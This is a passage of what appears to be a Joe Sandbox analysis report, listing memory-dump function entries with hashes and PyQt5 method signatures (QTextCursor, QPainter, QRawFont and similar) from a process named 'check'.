                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC011A76A08B46C1EB109F61E8496A933A4FB44FD0F914032D99E47324EF7CE95AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?selectionCursor@@End@FromLongLong_Text
                                                                                                                                                                                                                                          • String ID: QTextCursor$selectionEnd$selectionEnd(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1804637121-388535847
                                                                                                                                                                                                                                          • Opcode ID: b554f713f1e896e07991247548f3424fb63520df44eb863b76c2dabeeadfc684
                                                                                                                                                                                                                                          • Instruction ID: d4ff85c2d9879654da9461c47e50eea52c871e9c7877322e2a361cb8fe35142c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b554f713f1e896e07991247548f3424fb63520df44eb863b76c2dabeeadfc684
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0012C76A09A46C2EB10DF61E8496A933A4FB84FD4F914032C99E47324EF7DF559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?end@Bool_FromLongPainter@@
                                                                                                                                                                                                                                          • String ID: QPainter$end$end(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3078279030-2907001754
                                                                                                                                                                                                                                          • Opcode ID: ff9ab01418b46240d2e4be3e200489357fda87eb3647f1769a2dc4e752484549
                                                                                                                                                                                                                                          • Instruction ID: c830b69c43468d9af7c75b9d0d0a8735afe42a7d9489648d476b7db8f12edfca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff9ab01418b46240d2e4be3e200489357fda87eb3647f1769a2dc4e752484549
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83012C36A08A46D1EB109F61E8596A933E4FB44F90F914032C99E47320EF7CE569C348
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?verticalCursor@@FromLongLong_MovementText
                                                                                                                                                                                                                                          • String ID: QTextCursor$verticalMovementX$verticalMovementX(self) -> int
                                                                                                                                                                                                                                          • API String ID: 809924778-2152589566
                                                                                                                                                                                                                                          • Opcode ID: 802fc4828307869ec1570ed7fefe236d88c3d9862b71193516e603f40eeee678
                                                                                                                                                                                                                                          • Instruction ID: 1645bfe6ca53ce6d740093c73c2155e44b30af4c846ea22fcda90642ddf634a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 802fc4828307869ec1570ed7fefe236d88c3d9862b71193516e603f40eeee678
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5011A37A09A46C1EB109F61E8496A933A4FB44FD4F914032D99E47320EF7CE65AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?useBool_Extensions@FromHints@@LongStyle
                                                                                                                                                                                                                                          • String ID: QStyleHints$useRtlExtensions$useRtlExtensions(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 1774567688-2275637497
                                                                                                                                                                                                                                          • Opcode ID: 642a920b34a23916b7a2edabf9dabc67b817dba99bb84ad9bd649b5836e61222
                                                                                                                                                                                                                                          • Instruction ID: 8d0636a9359da6376cc6a333ff1f455d7101f2b9d926bb8962b1f03c5aed90ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 642a920b34a23916b7a2edabf9dabc67b817dba99bb84ad9bd649b5836e61222
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D011A36A09A46D1EB20DF21E8496A933E4FB40BD4F914032C99E47320EF7DE569C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?availableDocument@@FromLongLong_Steps@TextUndo
                                                                                                                                                                                                                                          • String ID: QTextDocument$availableUndoSteps$availableUndoSteps(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3083424710-3994648613
                                                                                                                                                                                                                                          • Opcode ID: df7aa769a23e3a1aebfdac480432c255ca28b6e5f67e700f76c14e00443e04a9
                                                                                                                                                                                                                                          • Instruction ID: bf77afdc4faf83db360b7b9a4afe9344586e45fc95b9effcacd4701ebae8b44e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df7aa769a23e3a1aebfdac480432c255ca28b6e5f67e700f76c14e00443e04a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF011A36A08A46C1EB109F61E8496A933A4FB44FD0F914032DA8E47324EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?elementCount@FromLongLong_PainterPath@@
                                                                                                                                                                                                                                          • String ID: QPainterPath$elementCount$elementCount(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3704173227-770691564
                                                                                                                                                                                                                                          • Opcode ID: 5e8eae33e957adeda2e6c44f5f5415e34df2f5c71493ce04467cc77140303649
                                                                                                                                                                                                                                          • Instruction ID: cff82d6f10b330883d5337aa2ad7e0f43d9217386937e4f2c1737d401aaee83b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8eae33e957adeda2e6c44f5f5415e34df2f5c71493ce04467cc77140303649
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77011A77E08A46D2EB10DF60E8496A933A4FB44F94F914032C99E43320EF7DE959C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?wheelFromHints@@Lines@LongLong_ScrollStyle
                                                                                                                                                                                                                                          • String ID: QStyleHints$wheelScrollLines$wheelScrollLines(self) -> int
                                                                                                                                                                                                                                          • API String ID: 219075363-4050251624
                                                                                                                                                                                                                                          • Opcode ID: 23b404e9987d58d32b766f6d394d485e891b9fedb3f7271c7071170fc0716ef8
                                                                                                                                                                                                                                          • Instruction ID: 495baf57f56bca873edec03aa48bb60b1cee2a0cfa30c685317c0bb9f20917ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23b404e9987d58d32b766f6d394d485e891b9fedb3f7271c7071170fc0716ef8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD011A76A09A46D1EB109F60E8496A933A4FB44F94F914032C98E43324EF7DE559C384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromItem@@LongStandardTristate@
                                                                                                                                                                                                                                          • String ID: QStandardItem$isTristate$isTristate(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 383762042-2587352797
                                                                                                                                                                                                                                          • Opcode ID: 090265bdb6405654f7bb5478f7fea592fdda225e52baa382c8aaa92c28b8b587
                                                                                                                                                                                                                                          • Instruction ID: 0f8815a8fba88e7452624280975af066305be39098ec25b2d31b329e9961d620
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 090265bdb6405654f7bb5478f7fea592fdda225e52baa382c8aaa92c28b8b587
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB01DA36E08A46D2EB10DF61E8496A933A4FB44BD5F914032D99E47320EF7DE569C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Style@$?capFromLongLong_Pen@@Qt@@
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$stencilBufferSize$stencilBufferSize(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2449751085-761713505
                                                                                                                                                                                                                                          • Opcode ID: 76651a812a8bd82d2f650f36542cf5ff6d50c44134464f6f38c3ff41dee4b672
                                                                                                                                                                                                                                          • Instruction ID: 48999dff499662e4c325a67f0a282eb9811f00924896e706ca361fdb35980eec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76651a812a8bd82d2f650f36542cf5ff6d50c44134464f6f38c3ff41dee4b672
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37011A76A08A46C1EB109F61E8496A933A4FB84FD4F914032C99E47324EF7DE559C384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?depth@FromLongLong_Screen@@
                                                                                                                                                                                                                                          • String ID: QScreen$depth$depth(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1346572956-3054028960
                                                                                                                                                                                                                                          • Opcode ID: 04d14bb8e25050dd9b0e952e75c2a41e3e2f1cab813fa43b7d8b5e77acc5005e
                                                                                                                                                                                                                                          • Instruction ID: b5848646ad7b094915508a40e915a48c10c498b2ec75c20e4e749e694bdc7838
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04d14bb8e25050dd9b0e952e75c2a41e3e2f1cab813fa43b7d8b5e77acc5005e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E012C36A08B46C1EB109F60E8496A933A4FB44FD4F918032DA9E43324EF7DF559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongNull@Vector2
                                                                                                                                                                                                                                          • String ID: QVector2D$isNull$isNull(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 6648286-38585300
                                                                                                                                                                                                                                          • Opcode ID: 3a87ccc9c40517c9e8a98463d79f45e325e8440336d5a99c6b4ab22a86f3967a
                                                                                                                                                                                                                                          • Instruction ID: 6fa9ff75878170ce1bb77eeeb30615d5b023c2bf8d529fb78d24efd0e71816b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a87ccc9c40517c9e8a98463d79f45e325e8440336d5a99c6b4ab22a86f3967a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61011E76A08A46C1DB109F51E8496A933E4FB44F94F914072CA9E43320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?firstFrame@@FromLongLong_Position@Text
                                                                                                                                                                                                                                          • String ID: QTextFrame$firstPosition$firstPosition(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3956399597-3694259807
                                                                                                                                                                                                                                          • Opcode ID: 2e587a2c7a73fef8e37bd71da686ffdebd02d2954c24a8d4ea80f5866df22037
                                                                                                                                                                                                                                          • Instruction ID: 57e93409ef0b32a741a3fbc768dd0dc90444d5ee69d2e364b54bbb5e6afcb06c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e587a2c7a73fef8e37bd71da686ffdebd02d2954c24a8d4ea80f5866df22037
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1012C76A08A46D1EB109F60E8496A933A8FB84FD0F914032C99E43320EF7DF65AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?senderFromIndex@LongLong_Object@@Signal
                                                                                                                                                                                                                                          • String ID: QTextBlockGroup$senderSignalIndex$senderSignalIndex(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2462028585-2797169557
                                                                                                                                                                                                                                          • Opcode ID: 9b1017e88e2f7bf60a12d420ebb58c044ab039b29ec9eeee62dd0f7e5aa838a6
                                                                                                                                                                                                                                          • Instruction ID: 781d9250fbb36e329db306d995208cfcbc9f345d9a3a74a31a00909612870ed8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b1017e88e2f7bf60a12d420ebb58c044ab039b29ec9eeee62dd0f7e5aa838a6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7011A76A08A46C1EB109F61E8496A933A4FB84F95F914032DA9E47320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_Cursor@@End@FromLongText
                                                                                                                                                                                                                                          • String ID: QTextCursor$atEnd$atEnd(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2565261672-3784715267
                                                                                                                                                                                                                                          • Opcode ID: 4792d838aaef5f563dc1efcc966a7f8342150eee3d3e551c64ee141a25a9198d
                                                                                                                                                                                                                                          • Instruction ID: f5d3eb1ae7b773071bf4ff13ffa0fa5b2041b420592f98e290b9e4b35b4b2770
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4792d838aaef5f563dc1efcc966a7f8342150eee3d3e551c64ee141a25a9198d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64012C36A09A46C1EB109F61E8496A937E4FB40FD4F914032D99E47320EF7DE569C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?leading@DoubleFloat_Font@@From
                                                                                                                                                                                                                                          • String ID: QRawFont$leading$leading(self) -> float
                                                                                                                                                                                                                                          • API String ID: 617535915-3077518540
                                                                                                                                                                                                                                          • Opcode ID: 7378f0b0bc36ca5fbf9a464e97da6615c4e09b5be7b51091b57ecd517134532f
                                                                                                                                                                                                                                          • Instruction ID: 4f46fc268dd2e8a830c2c388fb9a2ab00cedcf2d83c713407db0640d42c636db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7378f0b0bc36ca5fbf9a464e97da6615c4e09b5be7b51091b57ecd517134532f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9201E136A08A46D1DB10DF51E8496A933A4FB54FD4F914032C99E43320EF7DE959C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?deviceDoubleFloat_FromPixelRatio@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$devicePixelRatio$devicePixelRatio(self) -> float
                                                                                                                                                                                                                                          • API String ID: 3287233405-1767006637
                                                                                                                                                                                                                                          • Opcode ID: a0fe11ddb423bc3d5149061f5343d19de5dbdbc3bcf96ac03c9bda55776493cf
                                                                                                                                                                                                                                          • Instruction ID: 59c79b9cc855b853cf88bee7d4c8a6a270a9830f41587ea7e24eb060124202d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0fe11ddb423bc3d5149061f5343d19de5dbdbc3bcf96ac03c9bda55776493cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A301DA77A08A46C1EB109F51E8496A933A4FB44FD4F914032DA9E43330EF7DEA9AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_Font@@FromHeight@
                                                                                                                                                                                                                                          • String ID: QRawFont$xHeight$xHeight(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2731889199-1441519863
                                                                                                                                                                                                                                          • Opcode ID: 689d750fa7bf1945dbdf80602c3f03c9c172640ca3a9b92c00c50a6677e3052d
                                                                                                                                                                                                                                          • Instruction ID: 1e529cb2612bc32ccc12663435b6c20ae34c487366c7d6675a698912ae07d4c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 689d750fa7bf1945dbdf80602c3f03c9c172640ca3a9b92c00c50a6677e3052d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC01DE76A08B46D1DB109F51E8496A933A4FB54F94F914032C99E43320EF7DEA59C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?widthDoubleFloat_FromPen@@
                                                                                                                                                                                                                                          • String ID: QPen$widthF$widthF(self) -> float
                                                                                                                                                                                                                                          • API String ID: 64521866-462915029
                                                                                                                                                                                                                                          • Opcode ID: e410f8abd33b05d209969c46bc55700622f8c6b1af2c952791db382e58356e6a
                                                                                                                                                                                                                                          • Instruction ID: 25ebea586b670f0a96244c663b9b9c643bae5d63b0ea64c837c108b04ceafb91
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e410f8abd33b05d209969c46bc55700622f8c6b1af2c952791db382e58356e6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9012132A08A46C1DB109F61E8496A933E4FB50FD4F914032D99E43320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?fontDoubleFloat_FromGamma@Hints@@SmoothingStyle
                                                                                                                                                                                                                                          • String ID: QStyleHints$fontSmoothingGamma$fontSmoothingGamma(self) -> float
                                                                                                                                                                                                                                          • API String ID: 3917233285-1432461477
                                                                                                                                                                                                                                          • Opcode ID: 30c9579dd5f32fb26ab30d030fd2d037af56cc8a9190b9240cc6c9ed4e894f9b
                                                                                                                                                                                                                                          • Instruction ID: 35a1f81a66ddc89c09dd192a3bd2b5a2376e14b628144baa851a3f2bd045163c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30c9579dd5f32fb26ab30d030fd2d037af56cc8a9190b9240cc6c9ed4e894f9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601E836A08A46C1EB10DF61E8896A933A4FB44FD5F914032CA9E47330EF7DEA59C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?averageCharDoubleFloat_Font@@FromWidth@
                                                                                                                                                                                                                                          • String ID: QRawFont$averageCharWidth$averageCharWidth(self) -> float
                                                                                                                                                                                                                                          • API String ID: 3445971894-2341270624
                                                                                                                                                                                                                                          • Opcode ID: c151ae17790cb6613f2e6733e4c6ff8cc2a87a67ae0da5890618e6fd65816c24
                                                                                                                                                                                                                                          • Instruction ID: d337b642cd83b6cf782a7f674cc7bb81f710e363f5e72f5e00cca29d34a0162b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c151ae17790cb6613f2e6733e4c6ff8cc2a87a67ae0da5890618e6fd65816c24
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A01E136A08B46D1EB109F51E8496A937A4FB44FD4F914032C99E47320EF7DEA59C348
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?minimumDoubleFloat_FromLayout@@TextWidth@
                                                                                                                                                                                                                                          • String ID: QTextLayout$minimumWidth$minimumWidth(self) -> float
                                                                                                                                                                                                                                          • API String ID: 286786364-1117042158
                                                                                                                                                                                                                                          • Opcode ID: 7906030622871ebfb2a62ac5eabf4fec9e26204c4d4c7305c3a7adf05c16142e
                                                                                                                                                                                                                                          • Instruction ID: 6982f441f9f66d4c719a31480bad433de1592782deb27b8a03d29d1ec1050c11
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7906030622871ebfb2a62ac5eabf4fec9e26204c4d4c7305c3a7adf05c16142e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33012C33A08A46C1EB109F21E8496A933A4FB44FD4F914032DA9E43330EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?naturalDoubleFloat_FromLine@@Width@
                                                                                                                                                                                                                                          • String ID: QTextLine$naturalTextWidth$naturalTextWidth(self) -> float
                                                                                                                                                                                                                                          • API String ID: 455575366-3365953317
                                                                                                                                                                                                                                          • Opcode ID: 773e9792d820266d1748fa40e7cb877922f96a4a8a454bc182a22be4003b03b8
                                                                                                                                                                                                                                          • Instruction ID: 62f32df2e6b3d69ea5a6674f0a960efdbcee1680d44b5218d75166b75487249d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 773e9792d820266d1748fa40e7cb877922f96a4a8a454bc182a22be4003b03b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D501EC36A08E46D5EB109F61E8496A933A4FB44FD4F914032DA9E47320EF7DF69AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?dashDoubleFloat_FromOffset@Pen@@
                                                                                                                                                                                                                                          • String ID: QPen$dashOffset$dashOffset(self) -> float
                                                                                                                                                                                                                                          • API String ID: 1815483110-664962406
